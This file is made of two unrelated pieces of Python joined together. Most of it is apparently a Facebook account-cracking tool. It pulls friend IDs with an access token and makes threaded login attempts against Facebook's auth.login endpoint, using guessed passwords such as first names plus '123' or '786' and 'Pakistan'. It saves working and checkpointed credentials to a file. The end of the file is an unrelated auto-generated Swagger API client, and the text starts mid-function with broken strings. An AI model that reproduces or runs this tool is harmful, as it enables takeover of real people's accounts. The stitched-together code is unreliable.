	jalan('\033[1;92mPlease Wait\033[1;93m...')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[1;91mHacking\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
	print "\n\033[1;94m«-----\x1b[1;93m♡To Stop Process Press CTRL+Z♡\033[1;94m----»"
	print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mXpartxn.rixo\033[1;95m♡──────────•◈•──────────♡"
	
			
	def main(arg):
		global cekpoint,oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass #Dev:love_hack
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			b = json.loads(a.text)
			pass1 = ('786786')
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			q = json.load(data)
			if 'access_token' in q:
				print '\x1b[1;92mlogin\x1b[1;97m \x1b[1;92m✧\x1b[1;97m|' + user + '| \x1b[1;94m✧\x1b[1;97m-' + pass1
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in q["error_msg"]:
					print '\x1b[1;95mCheck\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1
					cek = open("out/checkpoint.txt", "a")
					cek.write(user+"|"+pass1+"\n")
					cek.close()
					cekpoint.append(user+pass1)
				else:
					pass2 = 'Pakistan'
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					q = json.load(data)
					if 'access_token' in q:
						print '\x1b[1;92mlogin\x1b[1;97m \x1b[1;94m✧\x1b[1;97m|' + user + '| \x1b[1;94m✧\x1b[1;97m-' + pass2
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in q["error_msg"]:
							print '\x1b[1;95mCheck\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2
							cek = open("out/checkpoint.txt", "a")
							cek.write(user+"|"+pass2+"\n")
							cek.close()
							cekpoint.append(user+pass2)
						
																	
															
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mXpartxn-rixo\033[1;95m♡──────────•◈•──────────♡"
	print "  \033[1;93m«---•◈•---Developed By Rixo---•◈•---»" #Dev:love_hack
	print '\033[1;91mProcess Has Been Completed\033[1;92m....'
	print"\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint))
	print """
             
             "Gullyboy;
def pilih_super():
    peak = raw_input("\n\033[1;91m^.^Choose an Option>>> \033[1;95m")
    if peak == "":
        print "\x1b[1;91mFill in correctly"
        pilih_super()
    elif peak == "1":
        os.system('clear')
        print logo
        print "\033[1;97m•◈•══════•◈•\033[1;91mKausar💋\033[1;97m•◈•══════•◈•"

        r = requests.get(
            "https://graph.facebook.com/me/friends?access_token=" + toket)
        z = json.loads(r.text)
        for s in z['data']:
            id.append(s['id'])
    elif peak == "2":
        os.system('clear')
        print logo
        idt = raw_input(
            "\033[1;95m[•◈•] \033[1;91mEnter ID\033[1;95m: \033[1;95m")
        print "\033[1;92m•◈•══════••◈•\033[1;91mMdKausar\033[1;95m•◈•══════••◈•"
        try:
            jok = requests.get("https://graph.facebook.com/" + idt +
                               "?access_token=" + toket)
            op = json.loads(jok.text)
            print "\033[1;91mName\033[1;95m:\033[1;95m " + op["name"]
        except KeyError:
            print "\x1b[1;91mID Not Found!"
            raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
            super()
        print "\033[1;91mGetting IDs\033[1;97m..."
        r = requests.get("https://graph.facebook.com/" + idt +
                         "/friends?access_token=" + toket)
        z = json.loads(r.text)
        for i in z['data']:
            id.append(i['id'])
    elif peak == "0":
        menu()
    else:
        print "\x1b[1;91mFill in correctly"
        pilih_super()

    print "\033[1;36;40m[✺] Total IDs : \033[1;94m" + str(len(id))
    jalan('\033[1;34;40m[✺] Please Wait...')
    titik = ['.   ', '..  ', '... ']
    for o in titik:
        print("\r\033[1;32;40m[✺] Cloning\033[1;93m" + o),
        sys.stdout.flush()
        time.sleep(1)
    print "\n\033[1;94m        ❈     \x1b[1;91mTo Stop Process Press CTRL+Z \033[1;94m    ❈"
    print "   \033[1;92m●══════════════════◄►══════════════════●"

    jalan('           \033[1;91m MD Kausar Islam    Hacking Wait...')
    print "  \033[1;92m ●══════════════════◄►══════════════════●"

    def main(arg):
        global cekpoint, oks
        user = arg
        try:
            os.mkdir('out')
        except OSError:
            pass  #Dev:Kausar
        try:
            a = requests.get('https://graph.facebook.com/' + user +
                             '/?access_token=' + toket)
            b = json.loads(a.text)
            pass1 = b['first_name'] + '1234'
            data = urllib.urlopen(
                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
            )
            q = json.load(data)
            if 'access_token' in q:
                x = requests.get("https://graph.facebook.com/" + user +
                                 "?access_token=" + q['access_token'])
                z = json.loads(x.text)
                print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                    'name']
                print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass1 + '\n'
                oks.append(user + pass1)
            else:
                if 'www.facebook.com' in q["error_msg"]:
                    print '\x1b[1;94m[ ❥ ] \x1b[1;94mHack100%💉'
                    print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                        'name']
                    print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                    print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass1 + '\n'
                    cek = open("out/super_cp.txt", "a")
                    cek.write("ID:" + user + " Pw:" + pass1 + "\n")
                    cek.close()
                    cekpoint.append(user + pass1)
                else:
                    pass2 = b['first_name'] + '123'
                    data = urllib.urlopen(
                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                    )
                    q = json.load(data)
                    if 'access_token' in q:
                        x = requests.get("https://graph.facebook.com/" + user +
                                         "?access_token=" + q['access_token'])
                        z = json.loads(x.text)
                        print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                        print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                            'name']
                        print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                        print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass2 + '\n'
                        oks.append(user + pass2)
                    else:
                        if 'www.facebook.com' in q["error_msg"]:
                            print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                            print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                'name']
                            print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                            print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass2 + '\n'
                            cek = open("out/super_cp.txt", "a")
                            cek.write("ID:" + user + " Pw:" + pass2 + "\n")
                            cek.close()
                            cekpoint.append(user + pass2)
                        else:
                            pass3 = b['last_name'] + '123'
                            data = urllib.urlopen(
                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                            )
                            q = json.load(data)
                            if 'access_token' in q:
                                x = requests.get(
                                    "https://graph.facebook.com/" + user +
                                    "?access_token=" + q['access_token'])
                                z = json.loads(x.text)
                                print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                    'name']
                                print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass3 + '\n'
                                oks.append(user + pass3)
                            else:
                                if 'www.facebook.com' in q["error_msg"]:
                                    print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                        'name']
                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass3 + '\n'
                                    cek = open("out/super_cp.txt", "a")
                                    cek.write("ID:" + user + " Pw:" + pass3 +
                                              "\n")
                                    cek.close()
                                    cekpoint.append(user + pass3)
                                else:
                                    pass4 = b['first_name'] + 'kausar'
                                    data = urllib.urlopen(
                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                    )
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        x = requests.get(
                                            "https://graph.facebook.com/" +
                                            user + "?access_token=" +
                                            q['access_token'])
                                        z = json.loads(x.text)
                                        print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                            'name']
                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass4 + '\n'
                                        oks.append(user + pass4)
                                    else:
                                        if 'www.facebook.com' in q[
                                                "error_msg"]:
                                            print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                'name']
                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass4 + '\n'
                                            cek = open("out/super_cp.txt", "a")
                                            cek.write("ID:" + user + " Pw:" +
                                                      pass4 + "\n")
                                            cek.close()
                                            cekpoint.append(user + pass4)
                                        else:
                                            pass5 = '786786'
                                            data = urllib.urlopen(
                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                + (user) +
                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                            )
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                x = requests.get(
                                                    "https://graph.facebook.com/"
                                                    + user + "?access_token=" +
                                                    q['access_token'])
                                                z = json.loads(x.text)
                                                print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                                    'name']
                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass5 + '\n'
                                                oks.append(user + pass5)
                                            else:
                                                if 'www.facebook.com' in q[
                                                        "error_msg"]:
                                                    print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                        'name']
                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass5 + '\n'
                                                    cek = open(
                                                        "out/super_cp.txt",
                                                        "a")
                                                    cek.write("ID:" + user +
                                                              " Pw:" + pass5 +
                                                              "\n")
                                                    cek.close()
                                                    cekpoint.append(user +
                                                                    pass5)
                                                else:
                                                    pass6 = 'Pakistan'
                                                    data = urllib.urlopen(
                                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                        + (user) +
                                                        "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                    )
                                                    q = json.load(data)
                                                    if 'access_token' in q:
                                                        x = requests.get(
                                                            "https://graph.facebook.com/"
                                                            + user +
                                                            "?access_token=" +
                                                            q['access_token'])
                                                        z = json.loads(x.text)
                                                        print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                                            'name']
                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass6 + '\n'
                                                        oks.append(user +
                                                                   pass6)
                                                    else:
                                                        if 'www.facebook.com' in q[
                                                                "error_msg"]:
                                                            print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                                'name']
                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass6 + '\n'
                                                            cek = open(
                                                                "out/super_cp.txt",
                                                                "a")
                                                            cek.write("ID:" +
                                                                      user +
                                                                      " Pw:" +
                                                                      pass6 +
                                                                      "\n")
                                                            cek.close()
                                                            cekpoint.append(
                                                                user + pass6)
                                                        else:
                                                            pass7 = b[
                                                                'first_name'] + '12345'
                                                            data = urllib.urlopen(
                                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                                + (user) +
                                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                            )
                                                            q = json.load(data)
                                                            if 'access_token' in q:
                                                                x = requests.get(
                                                                    "https://graph.facebook.com/"
                                                                    + user +
                                                                    "?access_token="
                                                                    +
                                                                    q['access_token']
                                                                )
                                                                z = json.loads(
                                                                    x.text)
                                                                print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                                                    'name']
                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass7 + '\n'
                                                                oks.append(
                                                                    user +
                                                                    pass7)
                                                            else:
                                                                if 'www.facebook.com' in q[
                                                                        "error_msg"]:
                                                                    print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                                        'name']
                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass7 + '\n'
                                                                    cek = open(
                                                                        "out/super_cp.txt",
                                                                        "a")
                                                                    cek.write(
                                                                        "ID:" +
                                                                        user +
                                                                        " Pw:"
                                                                        +
                                                                        pass7 +
                                                                        "\n")
                                                                    cek.close()
                                                                    cekpoint.append(
                                                                        user +
                                                                        pass7)
                                                                else:
                                                                    pass8 = b[
                                                                        'last_name'] + '786'
                                                                    data = urllib.urlopen(
                                                                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                                        + (user
                                                                           ) +
                                                                        "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                                    )
                                                                    q = json.load(
                                                                        data)
                                                                    if 'access_token' in q:
                                                                        x = requests.get(
                                                                            "https://graph.facebook.com/"
                                                                            +
                                                                            user
                                                                            +
                                                                            "?access_token="
                                                                            +
                                                                            q['access_token']
                                                                        )
                                                                        z = json.loads(
                                                                            x.
                                                                            text
                                                                        )
                                                                        print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                                                            'name']
                                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                                                        print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass8 + '\n'
                                                                        oks.append(
                                                                            user
                                                                            +
                                                                            pass8
                                                                        )
                                                                    else:
                                                                        if 'www.facebook.com' in q[
                                                                                "error_msg"]:
                                                                            print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                                                'name']
                                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                                                            print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass8 + '\n'
                                                                            cek = open(
                                                                                "out/super_cp.txt",
                                                                                "a"
                                                                            )
                                                                            cek.write(
                                                                                "ID:"
                                                                                +
                                                                                user
                                                                                +
                                                                                " Pw:"
                                                                                +
                                                                                pass8
                                                                                +
                                                                                "\n"
                                                                            )
                                                                            cek.close(
                                                                            )
                                                                            cekpoint.append(
                                                                                user
                                                                                +
                                                                                pass8
                                                                            )
                                                                        else:
                                                                            pass9 = b[
                                                                                'first_name'] + '786'
                                                                            data = urllib.urlopen(
                                                                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                                                                +
                                                                                (user
                                                                                 )
                                                                                +
                                                                                "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                                                                            )
                                                                            q = json.load(
                                                                                data
                                                                            )
                                                                            if 'access_token' in q:
                                                                                x = requests.get(
                                                                                    "https://graph.facebook.com/"
                                                                                    +
                                                                                    user
                                                                                    +
                                                                                    "?access_token="
                                                                                    +
                                                                                    q['access_token']
                                                                                )
                                                                                z = json.loads(
                                                                                    x
                                                                                    .
                                                                                    text
                                                                                )
                                                                                print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                                                                                    'name']
                                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                                                                                print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass9 + '\n'
                                                                                oks.append(
                                                                                    user
                                                                                    +
                                                                                    pass9
                                                                                )
                                                                            else:
                                                                                if 'www.facebook.com' in q[
                                                                                        "error_msg"]:
                                                                                    print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                                                                        'name']
                                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                                                                                    print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass9 + '\n'
                                                                                    cek = open(
                                                                                        "out/super_cp.txt",
                                                                                        "a"
                                                                                    )
                                                                                    cek.write(
                                                                                        "ID:"
                                                                                        +
                                                                                        user
                                                                                        +
                                                                                        " Pw:"
                                                                                        +
                                                                                        pass9
                                                                                        +
                                                                                        "\n"
                                                                                    )
                                                                                    cek.close(
                                                                                    )
                                                                                    cekpoint.append(
                                                                                        user
                                                                                        +
                                                                                        pass9
                                                                                    )

        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print "\033[1;95m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;91mMdkausar😉\033[1;95m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
    print "  \033[1;91m«---•◈•---Developed By Md Kausar-•◈•---»"  #Dev:Kausar
    print '\033[1;93m✅Process Has Been Completed Press➡ Ctrl+Z.↩ Next Type (python2 Md Kausar)↩\033[1;97m....'
    print "\033[1;91mTotal OK/\x1b[1;95mCP \033[1;93m: \033[1;91m" + str(
        len(oks)) + "\033[1;93m/\033[1;96m" + str(len(cekpoint))
    print """
 
         Checkpoint ID Open After 7 Days
•\033[1;95m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.
: \033[1;91m ....MD KAUSAR....... \033[1;95m :
•\033[1;95m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.' 
                Facebook
              \033[1;91m kAUSAR"""

    raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
    menu()
class CloudApiClient(object):
    """Generic API client for Swagger client library builds.

    Swagger generic API client. This client handles the client-
    server communication, and is invariant across implementations. Specifics of
    the methods and models for each application are generated from the Swagger
    templates.

    NOTE: This class is auto generated by the swagger code generator program.
    Ref: https://github.com/swagger-api/swagger-codegen
    Do not edit the class manually.

    :param configuration: Configuration object for this client
    :param header_name: a header to pass when making calls to the API.
    :param header_value: a header value to pass when making calls to
        the API.
    :param cookie: a cookie to include in the header when making calls
        to the API
    """

    PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
    NATIVE_TYPES_MAPPING = {
        'int': int,
        'long': int if six.PY3 else long,  # noqa: F821
        'float': float,
        'str': str,
        'bool': bool,
        'date': datetime.date,
        'datetime': datetime.datetime,
        'object': object,
    }

    def __init__(self,
                 configuration=None,
                 header_name=None,
                 header_value=None,
                 cookie=None):
        if configuration is None:
            configuration = Configuration()
        self.configuration = configuration

        self.pool = ThreadPool()
        self.rest_client = rest.RESTClientObject(configuration)
        self.default_headers = {}
        if header_name is not None:
            self.default_headers[header_name] = header_value
        self.cookie = cookie
        # Set default User-Agent.
        self.user_agent = 'Swagger-Codegen/1.0.0/python'

    def __del__(self):
        self.pool.close()
        self.pool.join()

    @property
    def user_agent(self):
        """User agent for this API client"""
        return self.default_headers['User-Agent']

    @user_agent.setter
    def user_agent(self, value):
        self.default_headers['User-Agent'] = value

    def set_default_header(self, header_name, header_value):
        self.default_headers[header_name] = header_value

    def __call_api(self,
                   resource_path,
                   method,
                   path_params=None,
                   query_params=None,
                   header_params=None,
                   body=None,
                   post_params=None,
                   files=None,
                   response_type=None,
                   auth_settings=None,
                   _return_http_data_only=None,
                   collection_formats=None,
                   _preload_content=True,
                   _request_timeout=None):

        config = self.configuration

        # header parameters
        header_params = header_params or {}
        header_params.update(self.default_headers)
        if self.cookie:
            header_params['Cookie'] = self.cookie
        if header_params:
            header_params = self.sanitize_for_serialization(header_params)
            header_params = dict(
                self.parameters_to_tuples(header_params, collection_formats))

        # path parameters
        if path_params:
            path_params = self.sanitize_for_serialization(path_params)
            path_params = self.parameters_to_tuples(path_params,
                                                    collection_formats)
            for k, v in path_params:
                # specified safe chars, encode everything
                resource_path = resource_path.replace(
                    '{%s}' % k,
                    quote(str(v), safe=config.safe_chars_for_path_param))

        # query parameters
        if query_params:
            query_params = self.sanitize_for_serialization(query_params)
            query_params = self.parameters_to_tuples(query_params,
                                                     collection_formats)

        # post parameters
        if post_params or files:
            post_params = self.prepare_post_parameters(post_params, files)
            post_params = self.sanitize_for_serialization(post_params)
            post_params = self.parameters_to_tuples(post_params,
                                                    collection_formats)

        # auth setting
        self.update_params_for_auth(header_params, query_params, auth_settings)

        # body
        if body:
            body = self.sanitize_for_serialization(body)

        # request url
        url = self.configuration.host + resource_path

        # perform request and return response
        response_data = self.request(method,
                                     url,
                                     query_params=query_params,
                                     headers=header_params,
                                     post_params=post_params,
                                     body=body,
                                     _preload_content=_preload_content,
                                     _request_timeout=_request_timeout)

        self.last_response = response_data

        return_data = response_data
        if _preload_content:
            # deserialize response data
            if response_type:
                return_data = self.deserialize(response_data, response_type)
            else:
                return_data = None

        if _return_http_data_only:
            return (return_data)
        else:
            return (return_data, response_data.status,
                    response_data.getheaders())

    def sanitize_for_serialization(self, obj):
        """Builds a JSON POST object.

        If obj is None, return None.
        If obj is str, int, long, float, bool, return directly.
        If obj is datetime.datetime, datetime.date
            convert to string in iso8601 format.
        If obj is list or tuple, sanitize each element.
        If obj is dict, sanitize each value in the dict.
        If obj is a swagger model, sanitize its properties dict.

        :param obj: The data to serialize.
        :return: The serialized form of data.
        """
        if obj is None:
            return None
        elif isinstance(obj, self.PRIMITIVE_TYPES):
            return obj
        elif isinstance(obj, list):
            return [
                self.sanitize_for_serialization(sub_obj) for sub_obj in obj
            ]
        elif isinstance(obj, tuple):
            return tuple(
                self.sanitize_for_serialization(sub_obj) for sub_obj in obj)
        elif isinstance(obj, (datetime.datetime, datetime.date)):
            return obj.isoformat()

        if isinstance(obj, dict):
            obj_dict = obj
        else:
            # Convert a model object to a dict, keeping only attributes
            # whose value is not None and mapping each attribute name to
            # its JSON key via `attribute_map` (the `swagger_types` and
            # `attribute_map` class attributes themselves are not emitted).
            obj_dict = {
                obj.attribute_map[attr]: getattr(obj, attr)
                for attr, _ in six.iteritems(obj.swagger_types)
                if getattr(obj, attr) is not None
            }

        return {
            key: self.sanitize_for_serialization(val)
            for key, val in six.iteritems(obj_dict)
        }

    def deserialize(self, response, response_type):
        """Deserializes response into an object.

        :param response: RESTResponse object to be deserialized.
        :param response_type: class literal for
            deserialized object, or string of class name.

        :return: deserialized object.
        """
        # handle file downloading
        # save response body into a tmp file and return the instance
        if response_type == "file":
            return self.__deserialize_file(response)

        # fetch data from response object
        try:
            data = json.loads(response.data)
        except ValueError:
            data = response.data

        return self.__deserialize(data, response_type)

    def __deserialize(self, data, klass):
        """Deserializes dict, list, str into an object.

        :param data: dict, list or str.
        :param klass: class literal, or string of class name.

        :return: object.
        """
        if data is None:
            return None

        if type(klass) == str:
            if klass.startswith('list['):
                sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
                return [
                    self.__deserialize(sub_data, sub_kls) for sub_data in data
                ]

            if klass.startswith('dict('):
                sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
                return {
                    k: self.__deserialize(v, sub_kls)
                    for k, v in six.iteritems(data)
                }

            # convert str to class
            if klass in self.NATIVE_TYPES_MAPPING:
                klass = self.NATIVE_TYPES_MAPPING[klass]
            else:
                klass = getattr(cloud_client.models, klass)

        if klass in self.PRIMITIVE_TYPES:
            return self.__deserialize_primitive(data, klass)
        elif klass == object:
            return self.__deserialize_object(data)
        elif klass == datetime.date:
            return self.__deserialize_date(data)
        elif klass == datetime.datetime:
            return self.__deserialize_datatime(data)
        else:
            return self.__deserialize_model(data, klass)

    def call_api(self,
                 resource_path,
                 method,
                 path_params=None,
                 query_params=None,
                 header_params=None,
                 body=None,
                 post_params=None,
                 files=None,
                 response_type=None,
                 auth_settings=None,
                 async_=None,
                 _return_http_data_only=None,
                 collection_formats=None,
                 _preload_content=True,
                 _request_timeout=None):
        """Makes the HTTP request (synchronous) and returns deserialized data.

        To make an asynchronous request, set the async_ parameter.

        :param resource_path: Path to method endpoint.
        :param method: Method to call.
